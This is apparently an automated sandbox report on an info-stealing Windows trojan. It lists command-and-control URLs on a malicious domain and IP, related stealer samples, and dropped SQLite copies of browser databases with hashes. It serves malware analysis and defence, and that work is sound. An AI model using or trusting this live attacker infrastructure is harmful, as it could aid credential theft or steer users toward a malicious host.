https://shaffatta.com/fdca69ae739b4897.phpnts	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	false		high
https://ac.ecosia.org/autocomplete?q=	c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	false		high
https://shaffatta.com	c4RAHq3BNl.exe, 00000000.00000002.3253214471.0000000002D5B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://shaffatta.com/fatta.com/	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/fatta.com/X	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	false		high
https://shaffatta.com/amData	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shaffatta.com/32e011d2eaa85a0/nss3.dll	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	false		high
https://shaffatta.com/fatta.com/DGIDAKEBAAKFCGHCBAKJDA	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	false		high
https://shaffatta.com/d3e	c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.176.196	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
168.119.248.46	shaffatta.com	Germany	24940	HETZNER-ASDE	true

Private

IP
192.168.2.13
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435676
Start date and time:	2024-05-03 02:06:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	c4RAHq3BNl.exe renamed because original name is a hash value
Original Sample Name:	5451fddd7b59b191df90b89a06ef1691.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/36@4/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 63 Number of non-executed functions: 221
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.40.131, 142.251.40.238, 172.253.122.84, 34.104.35.123, 72.21.81.240, 192.229.211.108, 142.251.40.163
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	file.exe	Get hash	malicious	Unknown	Browse
	https://herozheng.com/	Get hash	malicious	Unknown	Browse
	https://www.67rwzb.cn/	Get hash	malicious	Unknown	Browse
	https://www.bjvpza.cn/	Get hash	malicious	Unknown	Browse
	https://jingxinwl.com/	Get hash	malicious	Unknown	Browse
	https://vpassz.xu4nblog.com/	Get hash	malicious	Unknown	Browse
	https://broken-rain-1a74.1rwvvy66.workers.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://rdtetsyutfuyfrxytf.azurewebsites.net/	Get hash	malicious	TechSupportScam	Browse
	https://8952627338.z28.web.core.windows.net/?phone=09-70-18-72-82	Get hash	malicious	Unknown	Browse
	https://nthturn.com/	Get hash	malicious	Unknown	Browse
168.119.248.46	34cFFMVY3B.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
shaffatta.com	34cFFMVY3B.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	168.119.248.46

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	file.exe	Get hash	malicious	Vidar	Browse	95.217.245.42
	c8sDO7umrx.exe	Get hash	malicious	CMSBrute	Browse	49.13.210.40
	http://event.strategiedirect.com	Get hash	malicious	Unknown	Browse	167.233.13.125
	Jkxkt.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	Jkxkt.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	U8uFcjIjAR.exe	Get hash	malicious	LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	116.202.23.44
	yZcecBUXN7.exe	Get hash	malicious	FormBook	Browse	148.251.36.121
	List of items.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	135.181.215.231
	EMPLOYEE-FINAL-SETTLEMENTS.doc	Get hash	malicious	FormBook	Browse	148.251.36.121
	file.exe	Get hash	malicious	Vidar	Browse	95.217.245.42

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	file.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://checkyourvehicle.ca/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://collettre-7jk.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	SecuriteInfo.com.W32.Xpack.E.gen.Eldorado.25688.4607.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	Dadebehring PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	23.1.237.91
	https://url.us.m.mimecastprotect.com/s/qJHQCPNglVsqLAYTzYB59?domain=1drv.ms	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://offices-support.com	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://olp8111as000.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	GLAS_DeploymentMatrix_Full_26694_20240502_075604.xlsm	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://onedr1v3d0cum3nt.com	Get hash	malicious	Unknown	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Unknown	Browse	23.199.50.2 20.114.59.183
	https://herozheng.com/	Get hash	malicious	Unknown	Browse	23.199.50.2 20.114.59.183
	https://www.bjvpza.cn/	Get hash	malicious	Unknown	Browse	23.199.50.2 20.114.59.183
	https://broken-rain-1a74.1rwvvy66.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	23.199.50.2 20.114.59.183
	https://rdtetsyutfuyfrxytf.azurewebsites.net/	Get hash	malicious	TechSupportScam	Browse	23.199.50.2 20.114.59.183
	https://doc-54.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	23.199.50.2 20.114.59.183
	http://checkyourvehicle.ca/	Get hash	malicious	Unknown	Browse	23.199.50.2 20.114.59.183
	https://www.uhnrya.cn/	Get hash	malicious	Unknown	Browse	23.199.50.2 20.114.59.183
	https://wywljs.com/	Get hash	malicious	Unknown	Browse	23.199.50.2 20.114.59.183
	https://xdywna.com/	Get hash	malicious	Unknown	Browse	23.199.50.2 20.114.59.183
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	168.119.248.46
	JpFr8C6ljd.dll	Get hash	malicious	Unknown	Browse	168.119.248.46
	JpFr8C6ljd.dll	Get hash	malicious	Unknown	Browse	168.119.248.46
	file.exe	Get hash	malicious	SmokeLoader	Browse	168.119.248.46
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	168.119.248.46
	er).xla.xlsx	Get hash	malicious	Unknown	Browse	168.119.248.46
	SAL_000268_DOM.xls	Get hash	malicious	Unknown	Browse	168.119.248.46
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	168.119.248.46
	5801.xls	Get hash	malicious	Unknown	Browse	168.119.248.46
	RFQ-LOTUS 2024.exe	Get hash	malicious	FormBook, GuLoader	Browse	168.119.248.46

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	qa4Ulla1BY.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	U8uFcjIjAR.exe	Get hash	malicious	LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	JlvRdFpwOD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	LummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	0dN59ZIkEM.exe	Get hash	malicious	Vidar	Browse
	34cFFMVY3B.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	HFtuDDkdi6.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	qa4Ulla1BY.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	U8uFcjIjAR.exe	Get hash	malicious	LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	JlvRdFpwOD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	LummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	0dN59ZIkEM.exe	Get hash	malicious	Vidar	Browse
	34cFFMVY3B.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	HFtuDDkdi6.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AFHDAKJKFCFBGCBGDHCBAFCAKE

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAFBFCBGHDGCFHJJECAFBGDHDH

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAAAAFBKFIECAAKECGCA

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECFCBFBG

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EEGWXUHVUG.docx

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\ProgramData\EFOYFBOLXA.docx

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\ProgramData\EGIDHDGCBFBKECBFHCAFHJDBGH

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8529209666078965
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fB8p06K5STSPMrGEa:ThFawNLopFgU10XJB8i6WUQMrS
MD5:	19B7DF780969DFB405B507745A8D36F5
SHA1:	0490B6667DFF73F2E46306A6EC280D44F6EB318E
SHA-256:	543FEB5A8FF96C80BA52E07DB71124E85FAA5D242FBFECBD71DFB00EE1B27199
SHA-512:	F5FBD83EF03471D60448C2A06D31B2BE2D436B95C655A76A75EA8176ECA21C46C4C53B9E694A7C0C50561F66A1B4DD26A733B0934DF739886703C0174368BF47
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GRXZDKKVDB.xlsx

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\ProgramData\IEHDBAAFIDGDAAAAAAAA

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIIDAKJDHJKFHIEBFCGHCGHDGC

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGCFBAF

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\NVWZAPQSQL.docx

Download File

